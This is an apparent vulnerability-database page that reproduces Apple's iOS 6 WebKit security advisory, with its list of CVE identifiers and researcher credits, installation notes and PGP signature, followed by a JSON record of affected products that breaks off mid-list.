WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in WebKit. These issues were addressed through improved memory handling. CVE-ID CVE-2011-3016 : miaubiz CVE-2011-3021 : Arthur Gerkis CVE-2011-3027 : miaubiz CVE-2011-3032 : Arthur Gerkis CVE-2011-3034 : Arthur Gerkis CVE-2011-3035 : wushi of team509 working with iDefense VCP, Arthur Gerkis CVE-2011-3036 : miaubiz CVE-2011-3037 : miaubiz CVE-2011-3038 : miaubiz CVE-2011-3039 : miaubiz CVE-2011-3040 : miaubiz CVE-2011-3041 : miaubiz CVE-2011-3042 : miaubiz CVE-2011-3043 : miaubiz CVE-2011-3044 : Arthur Gerkis CVE-2011-3050 : miaubiz CVE-2011-3053 : miaubiz CVE-2011-3059 : Arthur Gerkis CVE-2011-3060 : miaubiz CVE-2011-3064 : Atte Kettunen of OUSPG CVE-2011-3068 : miaubiz CVE-2011-3069 : miaubiz CVE-2011-3071 : pa_kt working with HP's Zero Day Initiative CVE-2011-3073 : Arthur Gerkis CVE-2011-3074 : Slawomir Blazek CVE-2011-3075 : miaubiz CVE-2011-3076 : miaubiz CVE-2011-3078 : Martin Barbella of the Google Chrome Security Team CVE-2011-3081 : miaubiz CVE-2011-3086 : Arthur Gerkis CVE-2011-3089 : Skylined of the Google Chrome Security Team, miaubiz CVE-2011-3090 : Arthur Gerkis CVE-2011-3105 : miaubiz CVE-2011-3913 : Arthur Gerkis CVE-2011-3924 : Arthur Gerkis CVE-2011-3926 : Arthur Gerkis CVE-2011-3958 : miaubiz CVE-2011-3966 : Aki Helin of OUSPG CVE-2011-3968 : Arthur Gerkis CVE-2011-3969 : Arthur Gerkis CVE-2011-3971 : Arthur Gerkis CVE-2012-0682 : Apple Product Security CVE-2012-0683 : Dave Mandelin of Mozilla CVE-2012-1520 : Martin Barbella of the Google Chrome Security Team using AddressSanitizer, Jose A. Vazquez of spa-s3c.blogspot.com working with iDefense VCP CVE-2012-1521 : Skylined of the Google Chrome Security Team, Jose A. Vazquez of spa-s3c.blogspot.com working with iDefense VCP CVE-2012-2818 : miaubiz CVE-2012-3589 : Dave Mandelin of Mozilla CVE-2012-3590 : Apple Product Security CVE-2012-3591 : Apple Product Security CVE-2012-3592 : Apple Product Security CVE-2012-3593 : Apple Product Security CVE-2012-3594 : miaubiz CVE-2012-3595 : Martin Barbella of Google Chrome Security CVE-2012-3596 : Skylined of the Google Chrome Security Team CVE-2012-3597 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3598 : Apple Product Security CVE-2012-3599 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3600 : David Levin of the Chromium development community CVE-2012-3601 : Martin Barbella of the Google Chrome Security Team using AddressSanitizer CVE-2012-3602 : miaubiz CVE-2012-3603 : Apple Product Security CVE-2012-3604 : Skylined of the Google Chrome Security Team CVE-2012-3605 : Cris Neckar of the Google Chrome Security team CVE-2012-3608 : Skylined of the Google Chrome Security Team CVE-2012-3609 : Skylined of the Google Chrome Security Team CVE-2012-3610 : Skylined of the Google Chrome Security Team CVE-2012-3611 : Apple Product Security CVE-2012-3612 : Skylined of the Google Chrome Security Team CVE-2012-3613 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3614 : Yong Li of Research In Motion, Inc. CVE-2012-3615 : Stephen Chenney of the Chromium development community CVE-2012-3617 : Apple Product Security CVE-2012-3618 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3620 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3624 : Skylined of the Google Chrome Security Team CVE-2012-3625 : Skylined of Google Chrome Security Team CVE-2012-3626 : Apple Product Security CVE-2012-3627 : Skylined and Abhishek Arya (Inferno) of Google Chrome Security team CVE-2012-3628 : Apple Product Security CVE-2012-3629 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3630 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3631 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3633 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3634 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3635 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3636 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3637 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3638 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3639 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3640 : miaubiz CVE-2012-3641 : Slawomir Blazek CVE-2012-3642 : miaubiz CVE-2012-3644 : miaubiz CVE-2012-3645 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3646 : Julien Chaffraix of the Chromium development community, Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3647 : Skylined of the Google Chrome Security Team CVE-2012-3648 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3651 : Abhishek Arya (Inferno) and Martin Barbella of the Google Chrome Security Team CVE-2012-3652 : Martin Barbella of Google Chrome Security Team CVE-2012-3653 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3655 : Skylined of the Google Chrome Security Team CVE-2012-3656 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3658 : Apple CVE-2012-3659 : Mario Gomes of netfuzzer.blogspot.com, Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3660 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3661 : Apple Product Security CVE-2012-3663 : Skylined of Google Chrome Security Team CVE-2012-3664 : Thomas Sepez of the Chromium development community CVE-2012-3665 : Martin Barbella of Google Chrome Security Team using AddressSanitizer CVE-2012-3666 : Apple CVE-2012-3667 : Trevor Squires of propaneapp.com CVE-2012-3668 : Apple Product Security CVE-2012-3669 : Apple Product Security CVE-2012-3670 : Abhishek Arya (Inferno) of the Google Chrome Security Team, Arthur Gerkis CVE-2012-3671 : Skylined and Martin Barbella of the Google Chrome Security Team CVE-2012-3672 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3673 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2012-3674 : Skylined of Google Chrome Security Team CVE-2012-3676 : Julien Chaffraix of the Chromium development community CVE-2012-3677 : Apple CVE-2012-3678 : Apple Product Security CVE-2012-3679 : Chris Leary of Mozilla CVE-2012-3680 : Skylined of Google Chrome Security Team CVE-2012-3681 : Apple CVE-2012-3682 : Adam Barth of the Google Chrome Security Team CVE-2012-3683 : wushi of team509 working with iDefense VCP CVE-2012-3684 : kuzzcc CVE-2012-3686 : Robin Cao of Torch Mobile (Beijing) CVE-2012-3703 : Apple Product Security CVE-2012-3704 : Skylined of the Google Chrome Security Team CVE-2012-3706 : Apple Product Security CVE-2012-3708 : Apple CVE-2012-3710 : James Robinson of Google CVE-2012-3747 : David Bloom of Cue
WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to a cross- site disclosure of information Description: A cross-origin issue existed in the handling of CSS property values. This issue was addressed through improved origin tracking. CVE-ID CVE-2012-3691 : Apple
WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: A malicious website may be able to replace the contents of an iframe on another site Description: A cross-origin issue existed in the handling of iframes in popup windows. This issue was addressed through improved origin tracking. CVE-ID CVE-2011-3067 : Sergey Glazunov
WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to a cross- site disclosure of information Description: A cross-origin issue existed in the handling of iframes and fragment identifiers. This issue was addressed through improved origin tracking. CVE-ID CVE-2012-2815 : Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, and Dan Boneh of the Stanford University Security Laboratory
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Look-alike characters in a URL could be used to masquerade a website Description: The International Domain Name (IDN) support and Unicode fonts embedded in Safari could have been used to create a URL which contains look-alike characters. These could have been used in a malicious website to direct the user to a spoofed site that visually appears to be a legitimate domain. This issue was addressed by supplementing WebKit's list of known look-alike characters. Look- alike characters are rendered in Punycode in the address bar. CVE-ID CVE-2012-3693 : Matt Cooley of Symantec
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A canonicalization issue existed in the handling of URLs. This may have led to cross-site scripting on sites which use the location.href property. This issue was addressed through improved canonicalization of URLs. CVE-ID CVE-2012-3695 : Masato Kinugawa
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to HTTP request splitting Description: An HTTP header injection issue existed in the handling of WebSockets. This issue was addressed through improved WebSockets URI sanitization. CVE-ID CVE-2012-3696 : David Belcher of the BlackBerry Security Incident Response Team
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A maliciously crafted website may be able to spoof the value in the URL bar Description: A state management issue existed in the handling of session history. Navigations to a fragment on the current page may cause Safari to display incorrect information in the URL bar. This issue was addressed through improved session state tracking. CVE-ID CVE-2011-2845 : Jordi Chancel
WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to the disclosure of the disclosure of memory contents Description: An uninitialized memory access issue existed in the handling of SVG images. This issue was addressed through improved memory initialization. CVE-ID CVE-2012-3650 : Apple
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. The version after applying this update will be "6.0".
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJQWeYHAAoJEPefwLHPlZEwFlwP/1Ib/2m8K7orlPb3zmsKTyjo 3T0rFqu1LbXNzwLRhan7E7KiJoQ7U6yVO4045o/19AYZM+zGVNnHsCkUc3+Vcpa5 TZIM9Rik2iXKMxzttFfc5tvhE1u18PstsDLU/jvyW+s3XxMVL54wnSmW1R+P0de0 8+Q++IANogUj+scJzQkTaFDNDN5v1p0BT0+cifCcqktXB4H/PoaQ7drIWiDGYB/9 n4IL5AjM0BJBzWkldfjPimZ0BseSA0BxdeVCopmAgdnigyB60G4cWGzkU7E35VnP dWgdU9rnIIvGGe/vP912f7AoPtWs1b8n6DYCJgGRXvaRfPoHFUlXaRoVB6vJlMVs JXyMrw/RSDfYEgJdNbFOSxyJXHUkTkt4+aNW4KcoMR6raI/W5zKDyMEICw1wpkwP id6Dz4e6ncf+cfvAFqXpk02OC7iJqn71IJN2MvU/hC7797l++PINIoOHwJZolt+T xL3wV8p3Lk8K6lZx3Q9Tu6Dd7GYkxtjLCgV1NgdHOwPKDUOJ47oG6RjZAd6hpicp RqYXbk5bJpd3nZv+X6FrCZqGfeuwREWW7FJ0dI+/8ohlnisTz16f48W9FtuN3HIj bmxFJ46P4LGxrizwDSdBngxf3Utkh+7hGLuMH51/jR8+tCqDIEgpKBA+2F+IOmyP XtT4lS60xKz63YSg79dd =LvMt -----END PGP SIGNATURE----- . The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201202-0137",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 2.0,
"vendor": "suse",
"version": "11"
},
{
"model": "chrome",
"scope": "lt",
"trust": 1.0,
"vendor": "google",
"version": "17.0.963.56"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "11.4"
},
{
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "6.0"
},
{
"model": "mac os x server",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.7.0"
},
{
"model": "mac os x server",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.7.5"
},
{
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.7.5"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.8"
},
{
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.7.0"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.8"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "autonomy",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "emc",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hewlett packard",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hyland",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "lotus",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nuance",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "oracle",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "palisade",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "proofpoint",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "symantec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trend micro",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trustwave",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "verdasys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "websense",
"version": null
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.100"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.11"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.6"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.8"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.42"
},
{
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "linux enterprise sdk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.75"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.203"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1.1"
},
{
"model": "aura session manager",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.3.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.105"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.9"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.7"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.10"
},
{
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.7"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2.1"
},
{
"model": "beta01",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.27"
},
{
"model": "messaging storage server sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.213"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.306"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.17"
},
{
"model": "firefox beta10",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.11"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.208"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.4"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.1"
},
{
"model": "firefox beta6",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "lotus notes fix pack",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.34"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.15"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.2"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.12"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.5"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.4"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.21"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.127"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.16"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.7.1"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.3"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.4"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.44"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.225"
},
{
"model": "lotus notes fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.33"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.8"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "chrome",
"scope": "ne",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.56"
},
{
"model": "messaging storage server sp9",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2.3"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.7"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.107"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.8"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.219"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.36"
},
{
"model": "application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "aura system platform sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.218"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.217"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.1"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.19"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.8"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.20"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.2"
},
{
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "7.0.1"
},
{
"model": "linux enterprise server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.3.1"
},
{
"model": "aura experience portal sp2",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.3"
},
{
"model": "lotus notes fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.32"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.9"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.2"
},
{
"model": "aura application server sip core",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "firefox rc3",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.17"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.120"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.77"
},
{
"model": "ip office application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "8.0"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.3.0.3"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "firefox beta8",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.209"
},
{
"model": "productions pale moon",
"scope": "ne",
"trust": 0.3,
"vendor": "moonchild",
"version": "3.6.30"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.226"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.16"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.10"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.11"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.14"
},
{
"model": "beta01",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "8.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.121"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.17"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "aura presence services sp2",
"scope": "ne",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.13"
